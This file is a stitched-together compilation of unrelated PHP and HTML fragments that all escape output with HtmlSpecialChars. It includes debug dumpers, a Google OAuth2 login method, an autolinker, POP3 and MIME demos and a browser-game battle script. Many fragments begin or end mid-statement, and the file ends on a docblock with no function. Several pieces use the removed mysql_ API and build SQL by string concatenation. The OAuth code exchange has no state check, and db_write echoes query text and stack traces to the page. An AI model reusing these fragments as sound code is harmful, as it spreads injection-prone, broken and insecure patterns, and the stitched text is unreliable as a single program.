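/**
 * Debugging helper: renders a variable as an indented, HTML-escaped text tree.
 *
 * Arrays and objects are walked recursively (an array entry keyed "GLOBALS" is
 * skipped so a scope dump does not pull in the whole global table); anything
 * else is printed quoted on its own line. Keys and values go through
 * HtmlSpecialChars() so the result can be echoed into a page.
 *
 * @param mixed $Var   value to dump (taken by reference, as the callers expect)
 * @param int   $Level current nesting depth; each level indents by three spaces
 * @return string
 *
 * @version 1.0
 * @author Ibragimov "MpaK" Renat <*****@*****.**>
 * @copyright Copyright (c) 2009-2010, BESTWEB ltd. www.BESTWEB.ru
 */
function TextDump(&$Var, $Level = 0)
{
    $out = '';
    if (is_array($Var)) {
        $Type = "Array[" . count($Var) . "]";
    } elseif (is_object($Var)) {
        $Type = "Object";
    } else {
        $Type = "";
    }

    if ($Type) {
        $out .= "{$Type}\n";
        // foreach replaces the Reset()/each() idiom, which PHP 8 removed; it also
        // leaves the caller's internal array pointer untouched.
        $Level++;
        $indent = str_repeat(" ", $Level * 3);
        foreach ($Var as $k => $v) {
            if (is_array($v) && $k === "GLOBALS") {
                continue;
            }
            $out .= $indent . "<b>" . HtmlSpecialChars((string) $k) . "</b> => " . TextDump($v, $Level);
        }
    } else {
        // Cast first so null/bool values escape cleanly instead of tripping the
        // PHP 8.1 "passing null to string parameter" deprecation.
        $out .= '"' . HtmlSpecialChars((string) $Var) . '"' . "\n";
    }
    return $out;
}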
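/**
 * @author Melvil (https://github.com/Melvil)
 *
 * Echoes an HTML-coloured dump of `$Var`, recursing into arrays (and, at the
 * top level only, objects) down to `$level_limit` nesting levels.
 *
 * Output goes straight to stdout; the `NL` constant (defined elsewhere) is the
 * line separator. Scalar values and keys are HTML-escaped before being echoed;
 * `$Var_s` (the caller-supplied label) is echoed as-is, so pass a literal.
 *
 * @param mixed       $Var         value to dump (by reference, as callers expect)
 * @param int         $Level       current depth; 0 opens and closes the <pre>/<tt> wrapper
 * @param string|null $Var_s       optional label printed as "label = { ... }"
 * @param int         $level_limit deepest level that is still expanded
 * @return bool|null  true after a normal dump; null when the depth limit cut it short
 */
function dumpVar(&$Var, $Level = 0, $Var_s = null, $level_limit = 5)
{
    $is_ob_ar = false;
    $Type = gettype($Var);
    $childCount = 0;
    if (is_array($Var)) {
        $is_ob_ar = true;
        $childCount = count($Var);
        $Type = 'Array[' . $childCount . ']';
    } elseif (is_object($Var)) {
        $is_ob_ar = true;
        // count() on a non-Countable object throws a TypeError on PHP 8; count
        // the properties visible from this scope instead (the set foreach walks).
        $childCount = count(get_object_vars($Var));
    }

    if ($Level == 0) {
        if ($Var_s) {
            echo NL . '<br>' . NL . '<b><span style="color:#ff0000">' . $Var_s . ' = {</span></b>';
        }
        if ($is_ob_ar && $childCount) {
            echo '<pre>' . NL;
        } else {
            echo NL . '<tt>';
        }
        $Level_zero = 0;
    }

    if ($is_ob_ar) {
        if ($Type == 'object') {
            echo '<span style="color:#05a209">object of</span> <span style="color:#A03000">' . get_class($Var) . '</span>';
        } else {
            echo '<span style="color:#05a209">' . $Type . '</span>';
        }
        if ($Level > $level_limit) {
            // The cut-off marker names the configured limit rather than a fixed "5".
            if ($level_limit > 1) {
                echo '<b>...</b> LEVEL > ' . $level_limit . '<br>' . NL;
            } else {
                echo NL;
            }
            return;
        }
        echo NL;
        // Objects are only expanded at the top level; nested ones are just named.
        if ($Level == 0 || !is_object($Var)) {
            $Level++;
            $indent = str_repeat(' ', $Level * 3);
            // foreach replaces the Reset()/each() idiom, which PHP 8 removed.
            foreach ($Var as $k => $v) {
                echo $indent . '<b>' . HtmlSpecialChars((string) $k) . '</b> => ';
                // Never descend into the GLOBALS entry of a scope dump.
                if ($k === 'GLOBALS' && is_array($v)) {
                    echo NL;
                    continue;
                }
                dumpVar($v, $Level, null, $level_limit);
            }
        }
    } else {
        $iss = is_string($Var);
        if ($iss && strlen($Var) > 400) {
            // Long strings are summarised by byte length rather than printed.
            echo '(' . $Type . ') <span style="color:#35BBFA">strlen = ' . strlen($Var) . '</span>' . NL;
        } else {
            echo '(' . $Type . ') ' . ($iss ? '"' : '') . '<span style="color:#0000FF">';
            if ($Type == 'boolean') {
                echo $Var ? 'true' : 'false';
            } else {
                // Cast so null escapes as "" without the PHP 8.1 deprecation notice.
                echo HtmlSpecialChars((string) $Var);
            }
            echo '</span>' . ($iss ? '"' : '') . NL;
        }
    }

    if (isset($Level_zero)) {
        if ($is_ob_ar && $childCount) {
            echo '</pre>';
        } else {
            echo '</tt>';
        }
        if ($Var_s) {
            echo '<b><span style="color:#ff0000">}</span></b><br>' . NL;
        }
    }
    return true;
}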
/**
 * Writes one debug line, as HTML when `$this->html_debug` is set.
 *
 * Belongs to a class whose declaration is not in view; only `html_debug` is
 * read here. The output is flushed at once so it shows up during long runs.
 *
 * @param string $message text to emit (a newline is appended)
 * @return void
 */
function OutputDebug($message)
{
    $line = $message . "\n";
    if ($this->html_debug) {
        // Escape first, then turn newlines into <br /> so the markup survives.
        $line = str_replace("\n", "<br />\n", HtmlSpecialChars($line));
    }
    echo $line;
    flush();
}
/**
 * Prints `$message`: HTML-escaped with <br /> line breaks when the global
 * `$html` flag is truthy, otherwise as plain text followed by a newline.
 *
 * @param string $message
 * @return void
 */
function Output($message)
{
    global $html;
    if (!$html) {
        echo $message, "\n";
        return;
    }
    echo nl2br(HtmlSpecialChars($message));
}
/**
 * Runs the Google OAuth2 login round-trip for the current request and, on
 * success, fills this object's profile fields from the userinfo endpoint.
 *
 * Flow as written: a `?code=` parameter is exchanged for a token, stored in
 * `$_SESSION['token']`, and the browser is redirected; otherwise a token kept
 * in the session is reused, dropped on logout, and if one is still present
 * the profile is fetched and `$this->Info` is handed to UserRegister::checkAction.
 *
 * @return bool|void true when a user was loaded; false when no token is
 *                   available (the auth URL is then in `$this->createAuthUrl`);
 *                   nothing at all after the redirect in the `?code=` branch
 */
public function GoogleUser()
{
    $client = new \Google_Client();
    $client->setApplicationName(\SKT_GOOGLEOAUTH2_SETAPPLICATIONNAME);
    // Visit https://code.google.com/apis/console?api=plus to generate your
    // oauth2_client_id, oauth2_client_secret, and to register your oauth2_redirect_uri.
    $client->setClientId(\SKT_GOOGLEOAUTH2_SETCLIENTID);
    $client->setClientSecret(\SKT_GOOGLEOAUTH2_SETCLIENTSECRET);
    $client->setRedirectUri(\SKT_GOOGLEOAUTH2_SETREDIRECTURI);
    $client->setDeveloperKey(\SKT_GOOGLEOAUTH2_SETDEVELOPERKEY);
    $oauth2 = new \Google_Oauth2Service($client);
    if (isset($_GET['code'])) {
        // NOTE(review): no OAuth `state` value is compared here before the code is
        // exchanged — confirm whether the library or the calling page checks it.
        $client->authenticate($_GET['code']);
        $_SESSION['token'] = $client->getAccessToken();
        $redirect = \SITE_SERVER;
        \CmsDev\Header\refresh::refreshNow(\filter_var($redirect, FILTER_SANITIZE_URL));
        return;
    }
    if (isset($_SESSION['token'])) {
        $client->setAccessToken($_SESSION['token']);
    }
    if (isset($_REQUEST['logout']) or \THIS_URL_REAL === 'UserLogout') {
        unset($_SESSION['token']);
        $client->revokeToken();
    }
    if ($client->getAccessToken()) {
        $user = $oauth2->userinfo->get();
        // These fields are currently filtered through the PHP sanitize filters.
        // See http://www.php.net/manual/en/filter.filters.sanitize.php
        // FILTER_SANITIZE_STRING strips tags and encodes quotes, so these are not
        // the raw profile strings; it is deprecated as of PHP 8.1.
        $this->family_name = filter_var($user['family_name'], \FILTER_SANITIZE_STRING);
        $this->name = filter_var($user['name'], \FILTER_SANITIZE_STRING);
        $this->locale = filter_var($user['locale'], \FILTER_SANITIZE_STRING);
        $this->gender = filter_var($user['gender'], \FILTER_SANITIZE_STRING);
        $this->email = filter_var($user['email'], \FILTER_SANITIZE_EMAIL);
        $this->link = filter_var($user['link'], \FILTER_SANITIZE_URL);
        $this->given_name = filter_var($user['given_name'], \FILTER_SANITIZE_STRING);
        $this->id = filter_var($user['id'], \FILTER_SANITIZE_STRING);
        $this->verified_email = filter_var($user['verified_email'], \FILTER_SANITIZE_STRING);
        if (isset($user['picture']) && $user['picture'] != '') {
            // FILTER_VALIDATE_URL yields false (not a string) for an invalid URL.
            $this->picture = filter_var($user['picture'], \FILTER_VALIDATE_URL);
        } else {
            $this->picture = \SKT_ACCESS_AVATAR;
        }
        $this->ClientAuth = 'Google';
        $_SESSION['token'] = $client->getAccessToken();
        $this->createAuthUrl = $client->createAuthUrl();
        // Only the free-text name fields are HTML-escaped in Info; the remaining
        // values are passed through as filtered above.
        $this->Info = array(
            'family_name' => HtmlSpecialChars($this->family_name),
            'name' => HtmlSpecialChars($this->name),
            'locale' => $this->locale,
            'gender' => $this->gender,
            'email' => $this->email,
            'link' => $this->link,
            'given_name' => HtmlSpecialChars($this->given_name),
            'id' => $this->id,
            'verified_email' => $this->verified_email,
            'picture' => $this->picture,
            'ClientAuth' => $this->ClientAuth,
            'createAuthUrl' => $this->createAuthUrl,
        );
        \CmsDev\Security\UserRegister::checkAction($this->Info);
        return true;
    } else {
        $this->createAuthUrl = $client->createAuthUrl();
        new \CmsDev\Url\refer();
        return false;
    }
}
/**
 * Runs `$sql` through mysql_query() and, on failure, prints a diagnostic block.
 *
 * The diagnostic echoes the driver error, the full SQL text and db_trace() into
 * the response. That is handy while developing but discloses query text and
 * call-stack details to whoever sees the page, so keep it out of production.
 * Relies on the legacy mysql extension, which PHP 7 removed.
 *
 * @param string $sql query to execute (no quoting happens here)
 * @return resource|bool whatever mysql_query() returned
 */
function db_write($sql)
{
    $result = mysql_query($sql);
    if ($result) {
        return $result;
    }
    $lines = array(
        "ERROR: " . HtmlSpecialChars(mysql_error()),
        "SQL : " . HtmlSpecialChars($sql),
        "STACK: " . HtmlSpecialChars(db_trace()),
    );
    echo "<hr /><pre>";
    echo implode("\n", $lines) . "\n";
    echo "</pre><hr />\n";
    return $result;
}
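/**
 * Emits a collapsible HTML table listing the given test cases.
 *
 * Reads `$GLOBALS['tests']` (indexed by test id; each entry carries 'id',
 * 'address', 'valid' and 'warning') and post-increments `$GLOBALS['pageuids']`
 * to get a unique id for the show/hide div pair, which the page's `show()` /
 * `hide()` JavaScript toggles.
 *
 * @param array $show list of test ids to render
 * @return void
 */
function test_table($show)
{
    $uid = $GLOBALS['pageuids']++;
    $num = count($show);
    // $uid is an internal counter, not request input, so it can sit in the onclick attribute.
    echo "<div id=\"tests-{$uid}-1\"><a href=\"#\" onclick=\"show('$uid'); return false;\" style=\"font-size: 12px;\">Show $num tests</a></div>\n";
    echo "<div id=\"tests-{$uid}-2\" style=\"display: none;\"><a href=\"#\" onclick=\"hide('$uid'); return false;\" style=\"font-size: 12px\">Hide tests</a><br />\n";
    echo "<table border=1>\n";
    echo "<tr><th>ID</th><th>Address</th><th>Expected</th></tr>\n";
    foreach ($show as $id) {
        $test = $GLOBALS['tests'][$id];
        $address = $test['address'];
        // Force a break every 50 bytes (mid-word allowed) so long addresses do not
        // stretch the table; the marker becomes a real newline after escaping.
        $address = wordwrap($address, 50, "{FORCEBREAK}", true);
        $address = HtmlSpecialChars($address);
        $address = str_replace(array("\r", "\n", " ", "\0"), array("&#13;", "&#10;", " ", "&#0;"), $address);
        $address = str_replace('{FORCEBREAK}', "\n ", $address);
        echo "<tr>";
        // The id is escaped like every other cell; it comes from the test table.
        echo "<td>" . HtmlSpecialChars((string) $test['id']) . "</td>";
        // The cell escapes $address a second time. As far as can be told this is
        // deliberate: it shows the "&#13;"/"&#10;"/"&#0;" markers, and any entity
        // in the address itself, as visible text rather than rendering them — TODO confirm.
        echo "<td><small>" . HtmlSpecialChars($address) . "</small></td>";
        if (!$test['valid']) {
            $expected = 'Fail';
        } elseif ($test['warning']) {
            $expected = 'Pass w/ Warning';
        } else {
            $expected = 'Pass';
        }
        // The cell is closed here exactly once; no second "</td>" follows it.
        echo "<td>{$expected}</td>";
        echo "</tr>\n";
    }
    echo "</table>\n";
    echo "</div>\n";
}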
"><?php echo HtmlSpecialChars($endpoint['docs_url']); ?> </a> </li> <?php } ?> <?php foreach ($endpoint['example_urls'] as $example_url) { ?> <li> Example: <a href="<?php echo HtmlSpecialChars($example_url); ?> "><?php echo HtmlSpecialChars($example_url); ?> </a> </li> <?php } ?> <?php foreach ($endpoint['notes'] as $note) { ?> <li><?php echo format_html($note); ?> </li> <?php }
ob_start(); //testing show the raw email //echo "Message: \n".$msg."\n"; //includes require 'resources/pop3/mime_parser.php'; require 'resources/pop3/rfc822_addresses.php'; if (file_exists($_SERVER["PROJECT_ROOT"] . "/app/emails/email_translation.php")) { require_once $_SERVER["PROJECT_ROOT"] . "/app/emails/email_translation.php"; } //parse the email message $mime = new mime_parser_class(); $mime->decode_bodies = 1; $parameters = array('Data' => $msg); $success = $mime->Decode($parameters, $decoded); if (!$success) { echo "MIME message decoding error: " . HtmlSpecialChars($mime->error) . "\n"; } else { //get the headers //print_r($decoded[0]); $headers = json_decode($decoded[0]["Headers"]["x-headers:"], true); $subject = $decoded[0]["Headers"]["subject:"]; $from = $decoded[0]["Headers"]["from:"]; $reply_to = $decoded[0]["Headers"]["reply-to:"]; $to = $decoded[0]["Headers"]["to:"]; $date = $decoded[0]["Headers"]["date:"]; //get the body $body = ''; //$parts_array["Parts"][0]["Headers"]["content-type:"]; //get the body $body = ''; $content_type = $decoded[0]['Headers']['content-type:'];
/**
 * Debug helper: fetches `$url` with http_class and logs the body through
 * owa_coreAPI::debug().
 *
 * As written the request is opened but there is no SendRequest() or
 * ReadReplyHeaders() call between Open() and ReadReplyBody(), and the
 * connection is never Close()d; the `$error` values are assigned but never
 * checked. If http_class follows its usual open/send/read sequence this
 * cannot return a body — treat it as a scratch test, not a working fetch.
 *
 * @param string $url address to fetch
 * @return void
 */
function testFetch($url)
{
    $http = new http_class();
    owa_coreAPI::debug('hello owa_http testfetch method');
    /* Connection timeout */
    $http->timeout = 0;
    /* Data transfer timeout */
    $http->data_timeout = 0;
    /* Output debugging information about the progress of the connection */
    $http->debug = 1;
    $http->user_agent = owa_coreAPI::getSetting('base', 'owa_user_agent');
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    $http->exclude_address = "";
    $http->prefer_curl = 0;
    $arguments = array();
    $error = $http->GetRequestArguments($url, $arguments);
    $error = $http->Open($arguments);
    //for(;;)
    // {
    // $body is not initialised before this call; it relies on ReadReplyBody()
    // assigning through its reference parameter.
    $error = $http->ReadReplyBody($body, 50000);
    // NOTE(review): this logs the body only when there was an error or the body
    // is empty, which looks inverted from what a fetch test would want — confirm.
    if ($error != "" || strlen($body) == 0) {
        owa_coreAPI::debug(HtmlSpecialChars($body));
    }
    // }
}
/**
 * Scans `$text` for matches of `$sub` (a regex run against the lower-cased
 * copy) and wraps each qualifying match, extended to the end of the URL-like
 * run that follows it, in an <a> tag; everything else is copied through.
 *
 * A match is skipped when it sits inside an existing <a ...> tag, when it is
 * not preceded by whitespace or one of ( [ { >, or when no URL-like run
 * follows it. Trailing punctuation and an unmatched closing bracket are
 * trimmed from the URL. The href is HTML-escaped and, unless it already
 * starts with the bytes "http", prefixed with "http://" (so "HTTP://", other
 * schemes and bare hosts all receive the prefix).
 *
 * Only href and the link text are emitted: `$link_color`, `$span_tag` and
 * `$tagfill` (including the title= it may accumulate below) never reach the
 * output. `$GLOBALS['autolink_options']['strip_protocols']` controls whether
 * the scheme is dropped from the displayed text; cff_autolink_label() then
 * shortens it to `$limit`.
 *
 * @param string      $text         HTML/text to autolink
 * @param string      $link_color   unused
 * @param string      $sub          PCRE pattern that finds candidate URL starts
 * @param int         $limit        display-length limit handed to cff_autolink_label()
 * @param string      $tagfill      extra attributes; not emitted (see above)
 * @param bool        $auto_title   whether a title= attribute is appended to $tagfill
 * @param string      $span_tag     unused
 * @param string|null $force_prefix string prepended to every href
 * @return string
 */
function cff_autolink_do($text, $link_color, $sub, $limit, $tagfill, $auto_title, $span_tag, $force_prefix = null)
{
    // Offsets found in $text_l are applied to $text; this assumes lower-casing
    // does not change byte length (true for the ASCII-only strtolower of PHP 8).
    $text_l = StrToLower($text);
    $cursor = 0;
    $loop = 1;
    $buffer = '';
    while ($cursor < strlen($text) && $loop) {
        $ok = 1;
        $matched = preg_match($sub, $text_l, $m, PREG_OFFSET_CAPTURE, $cursor);
        if (!$matched) {
            $loop = 0;
            $ok = 0;
        } else {
            $pos = $m[0][1];
            $sub_len = strlen($m[0][0]);
            $pre_hit = substr($text, $cursor, $pos - $cursor);
            $hit = substr($text, $pos, $sub_len);
            $pre = substr($text, 0, $pos);
            $post = substr($text, $pos + $sub_len);
            // What gets copied verbatim (and skipped over) when this match is rejected.
            $fail_text = $pre_hit . $hit;
            $fail_len = strlen($fail_text);
            #
            # substring found - first check to see if we're inside a link tag already...
            #
            $bits = preg_split("!</a>!i", $pre);
            $last_bit = array_pop($bits);
            if (preg_match("!<a\\s!i", $last_bit)) {
                #echo "fail 1 at $cursor<br />\n";
                $ok = 0;
                $cursor += $fail_len;
                $buffer .= $fail_text;
            }
        }
        #
        # looks like a nice spot to autolink from - check the pre
        # to see if there was whitespace before this match
        #
        if ($ok) {
            // Truthiness test: a $pre of "0" is treated like an empty prefix.
            if ($pre) {
                if (!preg_match('![\\s\\(\\[\\{>]$!s', $pre)) {
                    #echo "fail 2 at $cursor ($pre)<br />\n";
                    $ok = 0;
                    $cursor += $fail_len;
                    $buffer .= $fail_text;
                }
            }
        }
        #
        # we want to autolink here - find the extent of the url
        #
        if ($ok) {
            if (preg_match('/^([a-z0-9\\-\\.\\/\\-_%~!?=,:;&+*#@\\(\\)\\$]+)/i', $post, $matches)) {
                $url = $hit . $matches[1];
                $cursor += strlen($url) + strlen($pre_hit);
                $buffer .= $pre_hit;
                // NOTE(review): after decoding, $url can be shorter than the source
                // text it came from, yet the trimming loops below move $cursor by
                // one per removed decoded byte — confirm entity-bearing URLs advance correctly.
                $url = html_entity_decode($url);
                #
                # remove trailing punctuation from url
                #
                while (preg_match('|[.,!;:?]$|', $url)) {
                    $url = substr($url, 0, strlen($url) - 1);
                    $cursor--;
                }
                // Drop a trailing closer that has no matching opener anywhere in the URL.
                foreach (array('()', '[]', '{}') as $pair) {
                    $o = substr($pair, 0, 1);
                    $c = substr($pair, 1, 1);
                    if (preg_match("!^(\\{$c}|^)[^\\{$o}]+\\{$c}\$!", $url)) {
                        $url = substr($url, 0, strlen($url) - 1);
                        $cursor--;
                    }
                }
                #
                # nice-i-fy url here
                #
                $link_url = $url;
                $display_url = $url;
                if ($force_prefix) {
                    $link_url = $force_prefix . $link_url;
                }
                if ($GLOBALS['autolink_options']['strip_protocols']) {
                    if (preg_match('!^(http|https)://!i', $display_url, $m)) {
                        $display_url = substr($display_url, strlen($m[1]) + 3);
                    }
                }
                $display_url = cff_autolink_label($display_url, $limit);
                #
                # add the url
                #
                if ($display_url != $link_url && !preg_match('@title=@msi', $tagfill) && $auto_title) {
                    $display_quoted = preg_quote($display_url, '!');
                    if (!preg_match("!^(http|https)://{$display_quoted}\$!i", $link_url)) {
                        // $link_url is not escaped here. That is harmless only while
                        // $tagfill is never written into the tag; escape it if that changes.
                        $tagfill .= ' title="' . $link_url . '"';
                    }
                }
                $link_url_enc = HtmlSpecialChars($link_url);
                $display_url_enc = HtmlSpecialChars($display_url);
                // Anything not beginning with "http" (case-sensitive) is forced to http://,
                // which also means no other scheme can end up in the href.
                if (substr($link_url_enc, 0, 4) !== "http") {
                    $link_url_enc = 'http://' . $link_url_enc;
                }
                $buffer .= "<a href=\"{$link_url_enc}\">{$display_url_enc}</a>";
            } else {
                #echo "fail 3 at $cursor<br />\n";
                $ok = 0;
                $cursor += $fail_len;
                $buffer .= $fail_text;
            }
        }
    }
    #
    # add everything from the cursor to the end onto the buffer.
    #
    $buffer .= substr($text, $cursor);
    return $buffer;
}
?> <HTML> <HEAD> <TITLE>mnoGoSearch: <? echo HtmlSpecialChars(StripSlashes($query_orig)); ?></TITLE> </HEAD> <body BGCOLOR="#FFFFFF" LINK="#0050A0" VLINK="#0050A0" ALINK="#0050A0"> <center> <FORM METHOD=GET ACTION="<? echo $self; ?>"> <table bgcolor=#eeeee0 border=0 width=100%> <tr><td> <BR> <INPUT TYPE="hidden" NAME="ps" VALUE="10"> Search for: <INPUT TYPE="text" NAME="q" SIZE=50 VALUE="<? echo HtmlSpecialChars(StripSlashes($query_orig)); ?>"> <INPUT TYPE="submit" VALUE="Search!"><BR> Results per page: <SELECT NAME="ps"> <OPTION VALUE="10" <? if ($ps==10) echo 'SELECTED';?>>10 <OPTION VALUE="20" <? if ($ps==20) echo 'SELECTED';?>>20 <OPTION VALUE="50" <? if ($ps==50) echo 'SELECTED';?>>50 </SELECT> Match: <SELECT NAME="m"> <OPTION VALUE="all" <? if ($m=='all') echo 'SELECTED';?>>All <OPTION VALUE="any" <? if ($m=='any') echo 'SELECTED';?>>Any <OPTION VALUE="bool" <? if ($m=='bool') echo 'SELECTED';?>>Boolean </SELECT>
/**
 * Close the server connection and delete the marked messages.
 *
 * When the server reports a problem, the (escaped) message is recorded via
 * Error::addError and false is returned.
 *
 * @return bool
 * @author Elias Müller
 */
public function close()
{
    $error = $this->server->Close();
    if ($error != "") {
        Error::addError("Fehler beim Trennen der Verbindung zum Mail-Server: " . HtmlSpecialChars($error), true);
        return false;
    }
    return true;
}
/**
 * Returns the first element of `$result`, HTML-escaped for output.
 *
 * @param array $result row whose element 0 holds the value to show
 * @return string
 */
function FormatCompleteValue($result)
{
    [$value] = $result;
    return htmlspecialchars($value);
}
for ($header_value = 0; $header_value < count($headers[$header_name]); $header_value++) { echo $header_name . ": " . $headers[$header_name][$header_value], "\r\n"; } } else { echo $header_name . ": " . $headers[$header_name], "\r\n"; } } echo "</PRE>\n"; flush(); echo "<H2><LI>Response body:</LI</H2>\n<PRE>\n"; for (;;) { $error = $http->ReadReplyBody($body, 1000); if ($error != "" || strlen($body) == 0) { break; } echo HtmlSpecialChars($body); } echo "</PRE>\n"; flush(); } } $http->Close(); } if (strlen($error)) { echo "<CENTER><H2>Error: ", $error, "</H2><CENTER>\n"; } ?> </UL> <HR> </BODY> </HTML>
<option value="w"<?php if ($mode === 'w') { echo ' selected'; } ?> >Word</option> <option value="l"<?php if ($mode === 'l') { echo ' selected'; } ?> >Line</option> </select></div> <?php if (isset($_POST['compare'])) { $diff = new diff_class(); $difference = new stdClass(); $difference->mode = $mode; $difference->patch = true; $after_patch = new stdClass(); if ($diff->FormatDiffAsHtml($before, $after, $difference) && $diff->Patch($before, $difference->difference, $after_patch)) { echo '<div>Difference</div><div class="frameResults">', $difference->html, '</div>'; echo '<div>Patch</div><div class="frameResults">', $after === $after_patch->after ? 'OK: The patched text matches the text after.' : 'There is a BUG: The patched text (<b>' . HtmlSpecialChars($after_patch->after) . '</b>) does not match the text after (<b>' . HtmlSpecialChars($after) . '</b>).', '</div>'; } else { echo '<div>Error: ', HtmlSpecialChars($diff->error), '</div>'; } } ?> </form> </body> </html>
$DOM->AddChild('Head', $Script); #------------------------------------------------------------------------------- $Script = new Tag('SCRIPT', array('type' => 'text/javascript', 'src' => 'SRC:{Js/TicketFunctions.js}')); #------------------------------------------------------------------------------- $DOM->AddChild('Head', $Script); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $DOM->AddAttribs('Body', array('onload' => "window.document.getElementById('Message').focus();")); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $Comp = Comp_Load('Formats/Edesk/Number', $TicketID); if (Is_Error($Comp)) { return ERROR | @Trigger_Error(500); } #------------------------------------------------------------------------------- $DOM->AddText('Title', HtmlSpecialChars(SPrintF('#%s | %s', $Comp, $Ticket['Theme']))); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $Comp = Comp_Load('Form/Input', array('name' => 'TicketID', 'type' => 'hidden', 'value' => $Ticket['ID'])); if (Is_Error($Comp)) { return ERROR | @Trigger_Error(500); } #------------------------------------------------------------------------------- $Form = new Tag('FORM', array('name' => 'TicketReadForm', 'onsubmit' => 'return false;', 'OnKeyPress' => 'ctrlEnterEvent(event,true) && TicketAddMessage();'), $Comp); #------------------------------------------------------------------------------- #------------------------------------------------------------------------------- $MaxMessageID = DB_Select('EdesksMessagesOwners', 'MAX(`ID`) AS `MaxMessageID`', array('UNIQ', 'Where' => SPrintF('`EdeskID` = %u', $Ticket['ID']))); 
#------------------------------------------------------------------------------- switch (ValueOf($MaxMessageID)) { case 'error': return ERROR | @Trigger_Error(500);
echo "<PRE>", HtmlSpecialChars($body[$line]), "</PRE>\n"; } echo "<PRE>---Message body ends above---</PRE>\n"; if (($error = $pop3->DeleteMessage(1)) == "") { echo "<PRE>Marked message 1 for deletion.</PRE>\n"; if (($error = $pop3->ResetDeletedMessages()) == "") { echo "<PRE>Resetted the list of messages to be deleted.</PRE>\n"; } } } } if ($error == "" && ($error = $pop3->Close()) == "") { echo "<PRE>Disconnected from the POP3 server "" . $pop3->hostname . "".</PRE>\n"; } } else { $error = $result; } } else { $error = $result; } } } } if ($error != "") { echo "<H2>Error: ", HtmlSpecialChars($error), "</H2>"; } ?> </BODY> </HTML>
/**
 * Prints `$foo` as an escaped var_export() listing inside a left-aligned <pre>.
 *
 * @param mixed $foo value to dump
 * @return void
 */
function dumper($foo)
{
    $listing = var_export($foo, true);
    echo "<pre style=\"text-align: left;\">", HtmlSpecialChars($listing), "</pre>\n";
}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>EMoji HTML Test</title>
<link href="emoji.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table border="1">
<tr>
<th>Unified</th>
<th>Name</th>
<th>Unified Text</th>
<th>HTML</th>
</tr>
<?php
// One row per sample code point: the U+ label, the escaped name, the raw UTF-8
// text, and the emoji_unified_to_html() conversion. The last cell is emitted
// unescaped — NOTE(review): confirm that helper only ever returns trusted markup.
$samples = array(0x2600, 0x1f493, 0x1f502);
foreach ($samples as $unified) {
    $bytes = "Hello " . emoji_utf8_bytes($unified) . " World";
    $cells = array(
        sprintf('U+%04X', $unified),
        HtmlSpecialChars(emoji_get_name($unified)),
        $bytes,
        emoji_unified_to_html($bytes),
    );
    echo "<tr>\n";
    foreach ($cells as $cell) {
        echo "<td>" . $cell . "</td>\n";
    }
    echo "</tr>\n";
}
?>
</table>
</body>
</html>
case 5: $timeo = 300; break; case 10: $timeo = 600; break; default: $timeo = 120; break; } $time = $now + 600; mysql_query("LOCK TABLES offers WRITE"); while (mysql_fetch_array(mysql_query("SELECT * FROM offers WHERE time=" . $time . ""))) { $time++; } $comment = HtmlSpecialChars($comment); mysql_query("INSERT INTO offers (`time`,`type`,`size_left`,`size_right`,`timeout`,`comment`, `blood`, `kulak`, `zone_width`, `zone_height`) VALUES (" . $time . ",1,1,1," . $timeo . ",'" . $comment . "'," . $blood . "," . $kulak . ",6,3)"); mysql_query("UNLOCK TABLES"); mysql_query("INSERT INTO participants (`time`,`id`,`side`,`base`,`hp`,`x`,`y`) VALUES (" . $time . "," . $stat['id'] . ",0," . $levels['base'] . "," . $stat['hp_now'] . ",1,1)"); } echo "<script>parent.main.location=\"battle.php?tmp=\"+Math.random();\"\"</script>"; } elseif ($page == "take_it" && $offer) { $shmot = mysql_fetch_array(mysql_query("select * from slots where id=" . $stat['id'] . "")); $user_offer = mysql_fetch_array(mysql_query("SELECT offers.time FROM offers, participants WHERE offers.time>" . $now . " AND offers.done=0 AND participants.time=offers.time AND participants.id=" . $stat['id'] . "")); if ($user_offer) { $offer_str = "Для начала с одной заявкой разберись..."; } else { $participants = mysql_query("SELECT * FROM participants WHERE participants.time=" . $offer . ""); switch (mysql_num_rows($participants)) { case 1: if ($stat['hp_now'] < ($stat['vitality'] * 5 + $stat['hp']) / 3) {
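// Build the pop3:// source URL for the parser. The account password is
// embedded in this string, so never echo $message_file.
$message_file = 'pop3://' . $user . ':' . $password . '@localhost/' . $message . '?debug=' . $debug . '&html_debug=' . $html_debug . '&realm=' . $realm . '&workstation=' . $workstation . '&apop=' . $apop . '&authentication_mechanism=' . $authentication_mechanism;
/*
 * Access Gmail POP account
 */
/*
$message_file='pop3://'.$user.':'.$password.'@pop.gmail.com:995/1?tls=1&debug=1&html_debug=1';
*/
$mime = new mime_parser_class();
/*
 * Set to 0 for not decoding the message bodies
 */
$mime->decode_bodies = 1;
$parameters = array('File' => $message_file);
$success = $mime->Decode($parameters, $decoded);
if (!$success) {
    echo '<h2>MIME message decoding error: ' . HtmlSpecialChars($mime->error) . "</h2>\n";
} else {
    echo '<h2>MIME message decoding successful</h2>' . "\n";
    echo '<h2>Message structure</h2>' . "\n";
    // The decoded structure carries header and body text taken from the message
    // itself, so it is escaped before being shown in the page.
    echo '<pre>';
    echo HtmlSpecialChars(print_r($decoded[0], true));
    echo '</pre>';
    if ($mime->Analyze($decoded[0], $results)) {
        echo '<h2>Message analysis</h2>' . "\n";
        echo '<pre>';
        echo HtmlSpecialChars(print_r($results, true));
        echo '</pre>';
    } else {
        // Escaped the same way as the decoding error above.
        echo 'MIME message analyse error: ' . HtmlSpecialChars($mime->error) . "\n";
    }
}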
/**
 * Turns a numeric escape (`&#NN;` or `%HH`) into the character it denotes.
 *
 * Negative values are replaced by 32 (a space). Values above 127 are not
 * decoded when the escape came from '%' or '&': they are re-emitted as an
 * escape of the same kind (`%hex` / `&#dec;`) because their meaning depends
 * on the character set, and so they cannot be used to smuggle in e.g. a
 * "javascript:" scheme. Everything else becomes the single byte chr($d),
 * run through HtmlSpecialChars() in case it is one of < > " &.
 *
 * @param string $orig_type '%' for URL escapes, '&' for HTML entities
 * @param int    $d         numeric value of the escape
 * @return string
 */
